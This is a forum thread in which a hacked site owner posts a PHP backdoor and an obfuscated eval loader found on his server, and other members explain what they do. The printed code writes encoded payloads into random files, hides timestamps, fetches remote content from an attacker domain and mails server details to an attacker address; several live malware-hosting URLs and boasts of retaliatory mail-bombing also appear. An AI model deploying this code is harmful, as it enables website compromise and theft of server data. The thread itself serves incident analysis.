Hackers code

[deansatch]

I recently had my site hacked and found hundreds of hidden links had appeared at the bottom of my index page.There were some newly created error.log files and there was a newly created php file in the root directory as well. Here are the contents of the php file if anyone can read through it and explain what this code does:

 

<?php
error_reporting(0);

$srand = "548";
$q = "due";
$abbr = "calyptra";
$ftro = "creation";
$admin = "i";
$relwrit = "./";

$_1 = "y"; $_2="o"; $_3 = "u";
$base = "cnV0aWxzLmNvbQ==";


if($_GET[$ftro]){
$zz = file_get_contents("http://".$_1.$_2.$_3.base64_decode($base)."/1.txt");
print str_replace("<?"."="."$"."q"."?>",$q,str_replace("<?="."$"."abbr"."?>",$abbr,$zz));
exit;
}


if($_GET['touch']){ if(file_exists("index.php")) $nm = "index.php"; if(file_exists("index.html")) $nm = "index.html"; if(file_exists("index.shtml")) $nm = "index.shtml"; if(file_exists("index.phtml")) $nm = "index.phtml"; if(file_exists("index.htm")) $nm = "index.htm"; print "Touching... ".$_SERVER['PHP_SELF']; $time = @filemtime($nm); if(@touch($_SERVER['PHP_SELF'],$time)) print "....OK"; exit; }

if($_GET['httpd_setup']){
$d = dir("./");
while (false !== ($entry = $d->read())) {
   if($entry!="."&&$entry!=".."){
	if(is_dir($entry))$go[] = $entry;
   }
}
$d->close();

function qq($length = 5)
{
  $password = "";
  $possible = "aaskljasdjabzcxnmaeoipqrehwejkavansbvsnadbv"; 
  $i = 0; 
  while ($i < $length) { 
    $char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
    if (!strstr($password, $char)) { 
      $password .= $char;
      $i++;
    }
  }
  return $password;
};

$i = "UTJsU01FbEVNR2RKYVRSMVRIbEpOME5wVW5sSlJEQm5TV2sxYjJSSE1YTkphbk5MWVZkWmIwbFhXbkJpUjFabVdsaG9jR016VW5wTFExSXdUR2xLY0dKdFVteGxRMGwxU2toSmNFdFRRV3RqYVVFNVNVTkpkV0ZJVW5SSmFuTkxZVmRaYjBsWFduQmlSMVptV2xob2NHTXpVbnBMUTFJd1RHbEtjR0p0VW14bFEwbDFTa2hKY0V0VFFXdGphVUU1U1VOSmRXTkhhSGRKYW5OTFEyMXNiVXREVW1aU01GWlZWM2xrYUZwSFVXNVlVMnczUTJsU2VWcFhSbXRKUkRCbllVaFNkR0pHT1d4aWJsSndaRWhzWmxwSFZtcGlNbEpzUzBkc2RHTkhlSFphUjFWdlNubGpjMXB0YkhOYVUyZHJaRU0wYVdGWE5XdGFXR2RwVEdsU2VVdFRhM0JQZDI5TFlWZFpiMGxYVm5sYVYyTnZTV3AzYUV4VE1VMVRWVFZNVlhreFRWTlZOVXhWZVRCMFVHbEpjMHBJU214WlYxRndTMWh6UzBOVFVtMWpRMEU1U1VkYWRtTkhWblZMUTFJd1RHbEtjR0p0VW14bFEwbDFTa2hKYzBsdVkybExWSE5MUTFkc2JVdEhXak5qYld3d1dsTm5hMXB1UVhOS1NFcHNXVmRSZFVsc2VIVlFRMFYwVEZWNFNsUnJkRlJNVlhoS1ZHdDBWRXhUTUN0SmFXdHdTVWhDZVdGWE5UQkpRMHBVV2xoU01XTkhWbXRNYVRSMVNXcHpTME5YV21waVJ6bDZXbE5uYTFwdVFYQlBkM0E1U1VkV2MyTXlWV2RqU0Vwd1ltNVJaMGxyUm5OamJWWm9Xa2hyZFV4cE5IVkphbk5MUTI0d1MwTnRiRzFMUTFKbVVqQldWVmQ1WkcxS01UQndaWGR2YTFwcFFUbEpSMXB3WWtkV1psb3lWakJZTWs1MlltNVNiR0p1VW5wTFExSm1VakJXVlZkNVpHMUtNVEJ3VDNkd2QyTnRiSFZrUTBGcldtcHpTMHBJU214WlYxRm5VRk5DYjJSSE1YTllNbFoxWkVkc01HVldPV3RhVjA1MldrZFZiMkZYTVhkaVJ6bHJXbE5uYmtwNWVHMWhWM2hzUzBOU01FeHBTbkJpYlZKc1pVTkpkVXBJU1hCTFUyczNRMjFzYlV0SFZubGFWMk52U1dwM2FFeFRNVTFUVlRWTVZYa3hUVk5WTlV4VmVUQjBVR2xKYzBwSVNteFpWMUZ3UzFoelMwTlJhMnRhV0dkblVGTkNiR1ZJUW5OaU1sSnNTME5KT0VsVE1IUlVSV3hQVXpGTmRGUkZiRTlUTVUxMFRGUTBhVXhEVW5sYVYwWnJTMVJ6UzBOUmEydGFibU5uVUZOQmExcFlhR0pOUmpCMVNXcDNhRXhUTVUxVFZUVk1WWGt4VFZOVk5VeFZlVEIwVUdsSmRVcEhXVGREWjJ0S1NrZGFkMGxFTUdkYWJUbDNXbGMwYjBwSVVYVkpiV3gxV2tkV05FbHBOR3RqYVhkcFpIbEpjRTkzYjBwRFYyeHRTMGRhTTJOdGJEQmFVMmRyV201QmMwcEhXak5MVTJ0blkwaEtjR0p1VVdkSmFuaHZUVlExTjFRd2MyaG1WSGQyWVVSRkswbHFjMHREVVd4dFdUSjRkbU15Vlc5S1IxcDNTMVJ6UzJaUmIwdG1VVzg5";

$scrp = base64_decode(base64_decode(base64_decode($i)));

$towrite = $go[mt_rand(0,count($go)-1)];
$qq = qq();
$fp = fopen($towrite."/".$qq.".php","w");
if(fwrite($fp,"<?php ".$scrp." ?>")) print "http://".$_SERVER['HTTP_HOST']."/".$towrite."/".$qq.".php";
else print "false";
fclose($fp);
exit;
}


if($_GET[$q]||$_GET[$admin]):
function IsBot() {
global $ref;
if(substr_count($ref,"&")<3) return true;
else return false;
};

function IsRefSE() {
global $ref;
if(substr_count($ref,"&")>2) return true;
else return false;
};

function logit($fname, $str){
$fp = @fopen ($fname, "a+");
@fwrite ($fp, $str);
@fclose ($fp);
if(file_exists("index.php")) $nm = "index.php";
if(file_exists("index.html")) $nm = "index.html";
if(file_exists("index.shtml")) $nm = "index.shtml";
if(file_exists("index.phtml")) $nm = "index.phtml";
if(file_exists("index.htm")) $nm = "index.htm";

    $time = @filemtime($nm);
    @touch($fname,$time);
};

$ref	=	$_SERVER['HTTP_REFERER']; $varquery = $_GET[$q];
$host	=	$_SERVER["HTTP_HOST"]; $agent	=	$_SERVER["HTTP_USER_AGENT"];  $ips	=	$_SERVER['REMOTE_ADDR'];  
$req	=	$_SERVER["REQUEST_URI"]; $http	=	$_SERVER['HTTP_HOST']; $self	=	$_SERVER['PHP_SELF'];
if(ereg("index",$self)) $self = str_replace("index.php","",$self);

if ($_GET[$admin]=='b'){ print '<pre>'.@file_get_contents($relwrit.'error.log').'</pre>'; exit;  }
    if ($_GET[$admin]=='s'){ print '<pre>'.@file_get_contents($relwrit.'error1.log').'</pre>'; exit; }
if ($_GET[$admin]=='n'){ print '<pre>'.@file_get_contents($relwrit.'error2.log').'</pre>'; exit; }

if (IsBot()==true){ logit($relwrit."error.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$agent."\t".$ips."\n"); }
else if(IsRefSE()==true) {  

logit($relwrit."error1.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$ref."\t".$agent."\t".$ips."\n"); 

$zz = file_get_contents("http://".$_1.$_2.$_3.base64_decode($base)."/2.txt");
header("Location: ".$zz);
exit;

}
else { logit($relwrit."error2.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$agent."\t".$ips."\n"); }

function GetPage($url) {
$url=str_replace("http://", "", $url);
$host=substr($url,0,strpos($url,"/"));
$path=substr($url,strpos($url,"/"));

$skt = @fsockopen($host, 80);
if (!$skt) return false;

	$requestHeader = "GET ".$path."  HTTP/1.1\r\n";
	$requestHeader.= "Host: ".$host."\r\n";
	$requestHeader.= "Connection: close\r\n\r\n";

		fwrite($skt, $requestHeader);

	$responseHeader = "";
	$responseContent = "";

	do{
		$responseHeader.= fread($skt, 1);
	  }
	while (!preg_match("/\r\n\r\n$/", $responseHeader));

	if (!strstr($responseHeader, "Transfer-Encoding: chunked")) {
		while (!feof($skt)) {
                        $responseContent.= fgets($skt, 128);
                    }
	}
	else {
		while ($chunk_length = hexdec(fgets($skt))) {
                        $responseContentChunk = "";
                        $read_length = 0;

				while ($read_length < $chunk_length) {
                            $responseContentChunk .= fread($skt, $chunk_length - $read_length);
                            $read_length = strlen($responseContentChunk);
                        }
                        $responseContent.= $responseContentChunk;
                        fgets($skt);
                    }
                }
           return chop($responseContent);
};

function GetRelatedGoogle($q) {
global $srand;
$q=trim(strtolower($q));
$url="http://www.google.com/search?hl=en&safe=off&tbo=1&q=".urlencode($q)."&tbs=clue:1";

$content=GetPage($url);
preg_match_all("#sceq(.*)amp#U", $content, $result_preg);

foreach($result_preg[0] as $op){
$op = str_replace("sceq:","",$op);
$op = str_replace("&","",$op);
$op = str_replace("+"," ",$op);
$op = str_replace("amp"," ",$op);
@$arr[] = $op;
}

srand($srand);
shuffle($arr);
$result=$arr;

return $result;
};

function GetRelated($q){
		$q=trim(strtolower($q));
		$url="http://www.google.com/trends/hottrends?q=".urlencode($q);
		$content=GetPage($url);
		preg_match_all("#<b>Related searches:</b><br>(.*)<br><br>#U", $content, $result_preg);
		$result=trim($result_preg[1][0]);
		$result=explode(',',$result);
		return $result;
};

function GetYoutube($q){
global $relwrit;
		$q=urlencode(trim(strtolower($q)));
		$url = "http://www.youtube.com/results?search_query=".$q."&search_type=&aq=f";
		$content=GetPage($url);
		preg_match_all('#video-long-title-(.*)"#U', $content, $result_preg);
		$result = $result_preg[1];
		return $result;

}
$page = ucwords(str_replace("-"," ",$_GET[$q]));
$page = ucwords($page);

$serp = GetPage("http://www.google.com/search?hl=en&as_q=".urlencode(strtolower($page))."&as_epq=&as_oq=&as_eq=&num=32&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=(cc_publicdomain|cc_attribute|cc_sharealike|cc_noncommercial).-(cc_nonderived)&as_occt=any&cr=countryUS&as_nlo=&as_nhi=&safe=images");

preg_match_all('#<div class="s">(.*)<b>...</b></div>#U',$serp,$rs);

$newsg = array();
foreach($rs[1] as $output){
	$output = html_entity_decode(strip_tags($output));
	$newsg[] = $output;
}


$serp2 = GetPage("http://www.google.com/search?hl=en&sa=G&tbo=1&q=".urlencode(strtolower($page))."&tbs=nws:1&num=39");
preg_match_all("#</nobr><br><div>(.*)</div>#U",$serp2,$rs2);

foreach($rs2[1] as $output2){
	$output2 = html_entity_decode(strip_tags($output2));
	$newsg[] = $output2;
}


@srand($srand);
@shuffle($newsg);
$today = date("F d, Y");

$rels = GetRelated($page);
foreach($rels as $kro){
$kro = trim($kro);
$url = str_replace(" ","-",$kro);
if($kro) $relis .= "<li> <a href=\"http://{$http}{$self}?{$q}={$url}\">".ucwords($kro)."</a> </li> ";
}

@srand(633);
@shuffle($relis);

$cont = '';
for($i=0;$i<count($newsg);$i++){
$cont .= "".str_replace("...","",trim(ucfirst($newsg[$i]))).". <br /><br />\n\n ";
}

$rel = GetRelatedGoogle($page);

for($i=0;$i<count($rel);$i++){
$undretit .= "".trim($rel[$i]).", ";
}
$undretit = substr(trim($undretit), 0, -1);
$relis = substr(trim($relis), 0, -1);
/*
*/

//*******************************
if($_GET['ddd']){
$susel = '';
$over = '';
$alrt  = '';
}else{
//$susel = "<script>".$q."('".$abbr."', '".$page."');</script>";
//$over = "style=\"overflow: hidden;\"";
$susel = '';
$over = '';
}


$pg = "
<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"> 
<html xmlns=\"http://www.w3.org/1999/xhtml\" dir=\"ltr\"> 
    <head profile=\"http://www.webdevout.net/profile/1.5/\"> 
<title>$page</title>
$susel
    </head> 
<style>
*{
font-family: Courier New;
}
hr {
height:2px;
color:#263731
#rauki{
left: 296px;
height: 616px;
margin: 23px;
}
#abelu{
background-color: #616283;
}
#ubeal{
color: #663061;
font-family: Times New Roman;
}
#irebo{
font-size: 25px;
}
#eolud{
}
#kuoiabr{
border: 5px #672045 dashed;
font-size: 13px;
color: #192957;
}
#earldbo{
border: 5px #124619 solid;
font-size: 15px;
color: #353664;
}
#oerlka{
color: #399028;
border: 9px #895357 dotted;
font-size: 12px;
}
#ardule{
color: #214920;
border: 5px #163620 dashed;
font-size: 15px;
}
#irkude{
color: #427449;
border: 7px #485044 dashed;
font-size: 11px;
}
#eabrou{
color: #141898;
border: 5px #859459 dashed;
font-size: 11px;
}

</style>
</head>
<body id=\"abelu\">
<div id=\"rauki\">
<h4 id=\"ubeal\">$page</h4>
<p><div><br /> <div></p>
<div id=\"oerlka\">
<div id=\"ardule\">
<div id=\"irkude\">
<div id=\"eabrou\">
<h2>$today $page</h2>
<div id=\"irebo\">$cont</div>
<ol>
$relis
</ol>
</div>
</div>
</div>
</div>
<div id=\"eolud\">
<div id=\"kuoiabr\">
<div id=\"earldbo\">
$undretit
</div>
</div>
</div>
</div>
</body>
</html>

";

print $pg;


exit;
endif;
?>

[RichardRotterdam]

Looking at just the first few lines it looks like it's injecting php code into that php file from a different domain. However I suggest you search for what's causing this rather then what's doing it.

[deansatch]

I thought this script might give some clues about how it got there in the first place or where it came from

[Buddski]

That file was uploaded to your server (no idea how) but it basically has given the person responsible the ability to execute PHP..

First it reads a file from yourutils.com/1.txt ( a repoted hack site )

which runs a few eval functions on your system.

 

Further down in the code it iterated through your file system to find the index file type you are using and appends some of its stuff in there. Thats as far as ive gotten thus far but from other looks I would assume that they are using those created log files to change their methods to suit your server..

 

I wouldnt REALLY worry about what it does.. Just how it got there and future prevention.

Do you have any upload scripts on your server?

[deansatch]

Thanks

 

How it got there is a mystery. I have no upload scripts or forms. I am a hosting reseller and noticed that 3 of my customers sites had the same hack. I also noticed that the hundreds of links that were appended to the page were all customers of the same hosting company that I resell (according to whois). Each link had a randomly named php file at the end e.g. domain.com/hackfile.php?hyt=a_story_about_someone

 

Of course the hosting company in question denied that it was a hole in their security and that it must have been my site that was hacked.

[Buddski]

Hrmm it could be your provider that is the problem if other customers are having the same issue..

[RichardRotterdam]

If you are using a ftp client to upload your files and you saved the passwords in that client, there is a possibility that a virus stole those passwords.

 

Also try a search on this forum, you might find topics that could be of use to you.

 

here are some:

http://www.phpfreaks.com/forums/index.php/topic,268580.msg1267048.html#msg1267048

 

http://www.phpfreaks.com/forums/index.php/topic,252960.msg1188182.html#msg1188182

 

http://www.phpfreaks.com/forums/index.php/topic,249837.msg1170921.html#msg1170921

[oni-kun]

Yes, it seems one way or another they found an exploit in the permissions or script structure and executed a shell to upload files to batch away at their will with their poorly written code.

 

I'd recommend to change all passwords, Especially your (cPanel|Plesk) and FTP/admin area. It may be a good idea to check server logs (apache's) and see if there was anything going on from a client, or it was an 'inside job'.

 

EDIT: '$fp = fopen($towrite."/".$qq.".php","w");' , The script may be spreading itself.

[deansatch]

The host I use allows me and any of it's customers to log on with SSH access which apparently enables anyone to access any other accounts files on the server - but accessing any files other than your own is forbidden and logged...apparently. Do you think one customer could have logged in to the server this way undetected or just took the risk of not being noticed and planted the files, or even a single file that can spread to all index pages on the server?

[deansatch]

Quick update if anyone can help. I tracked down a text file that the hacker has somehow managed to run on my site - it is hosted on another victims site.

 

The text contains the following code:

 

<?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?>
<?
function d($s, $k='')
{
if($k=='')
{
for($i=0;$i<strlen($s);$i){
$d.=chr(hexdec(substr($s, $i, 2)));
$i=(float)($i)+2;
}
return $d;}
else{
$r='';
$f=d('6261736536345f6465636f6465');
$u=$f('Z3ppbmZsYXRl');
$s=$u($f($s));
for($i=0;
$i<strlen($s);$i++){
$c=substr($s, $i, 1);
$kc=substr($k, ($i%strlen($k))-1, 1);
$c=chr(ord($c)-ord($kc));
$r.=$c;
}return $r;
}
}
eval(d("VZL7TuJAGMUfbfcV1HUJoMnakVvqLUqhpVNoYVpmaBvRXul0hqq0XOpGH3HR7CbuvyfnJL/zfYdGtTov8jSv/VzXj3pGr3K8ub4STo7HqFKl+Span1aKXwd3unRY2d5cs0eeh/WT94im1Wq1dvleXS55eHh98EODRvmAZcFrwCtnqZWONRPslsnnQGS2mfAZacvhdFvgZ+ohhhtmKsnB0iAou6PojbzMqbo1TJiPty2oSZNXx3H5PQAbW8H5pORpcN5fuu6zqKeiMaBcHEqktInN4yWg9pmjEIGqVt9JNGul97hJ50TnhqmtogHZGLSzgbzF7gVdtrirYr5bmvJkitUL1Rb0qQrATpNvTIRVYtqabwhQtjBRMSARxirUmqCj3wqaqrRZQJx4bN5tfU2KKW4lHsGrobWLocK2UAGLB4AFm7RbQ8lAaCqMyYDE2EJ9i+67lXLqzW7Lf75H5eItUoymTSYs5MkXvvL/LAef2aAxpT7vinoXxZZAMGEuImWgEtWc3J8lYwugF3vP0ptkLHCNTJeExYCXO8Q0E1nZQoNakgAceBnZOaTNVKXXhrK5nmPAidKW45myCBrDD42mpJv4DeMp5G+FiW8/tOekv1ujD+Ze8dlX512WKCHzS3jRnxSpk6mbAO/5Uqf0zoEIJb2Ag6D0XbTWmRiTV8BH9O/feItOFbTxzssepGI6AyMZP7myw/IMyeYMyzcDC4ym+9uvddqk+hboAdGefClefNnaBu53EBL1ZSR32YLomSZ1Mzcz1r6Zdo5vjqLfj7zmeUXSaYZBFGRhfFrhqziq1y6/f4t3WX75Bw==", 1235327122));
?>

 

Does anyone know what this code is supposed to be trying to do?

[Buddski]

Its grabs a whole heap of your server settings and emails it..

$creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20="); ($safe_mode)?($safez="ON")$safez="OFF_HEHE"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from ="From: ".$writ."___=".$safez.""; mail( $creator, $subj, $msg, $from);

 

the email's are being sent to ban.dage07@gmail.com

[oni-kun]

Its grabs a whole heap of your server settings and emails it..

$creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20="); ($safe_mode)?($safez="ON")$safez="OFF_HEHE"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from ="From: ".$writ."___=".$safez.""; mail( $creator, $subj, $msg, $from);

 

the email's are being sent to ban.dage07@gmail.com

 

Botnet + gmail's lack of origin awareness checking = ..

 

I sent atleast 72k e-mails with random .cn domain names. Bleh, anyway, selecting secure passwords on the first place is a good thing OP, I'd recommend evaluating every aspect of your web server and scripts (a backup?) and start new, not your fault.

[redarrow]

This is a example why validating all your code is so important.

 

also show's you why members must have accounts to upload stuff.

 

Dam people.

 

so many people wanting to get account info/ user names/passwords.

 

as hosting get cheaper, the more people want to use other peoples accounts.

 

sheared host are so bad these days due to lack off security.

 

makes me so mad...

 

[deansatch]

Nice work people! Thanks! So now we have his email, can anything be done about it?

[oni-kun]

Nice work people! Thanks! So now we have his email, can anything be done about it?

 

I sent him 74k e-mails of his own code, so I think he'll be busy enough to miss yours. There isn't much to be done really, just not many laws in place that can really support this, or prove it.

[deansatch]

 

I also have these links where the hackers code is still hosted - is he using unsuspecting victims websites to host his code on or would these be his own sites? The actual sites look fairly respectable and honest.

 

http://disk.yonghyuk.pe.kr/comet/id1.txt

http://musicadelibreria.net/footer

http://www.forex-biznes.ru/setlinks_13a40/zfxid1.txt

[oni-kun]

 

I also have these links where the hackers code is still hosted - is he using unsuspecting victims websites to host his code on or would these be his own sites? The actual sites look fairly respectable and honest.

 

http://disk.yonghyuk.pe.kr/comet/id1.txt

http://musicadelibreria.net/footer

http://www.forex-biznes.ru/setlinks_13a40/zfxid1.txt

 

http://whois.domaintools.com/musicadelibreria.net

http://www.nic.ru/whois/?query=forex-biznes.ru

 

They look like to be honest botnetted/ or a relay from an infected site like your own. Be sure to block any data coming/going to these adresses you may want to disallow the IPs of them in a .htaccess file to deny any possible traffic for later preventative measures.

[mga_ka_php]

my website has been hacked also. just found r3m1ck.html file in my public_html. didn't find any other files. but i removed all of my web files and reuploaded again.

[jay7981]

add another 150k emails from me with a small surprise in a fe of them ...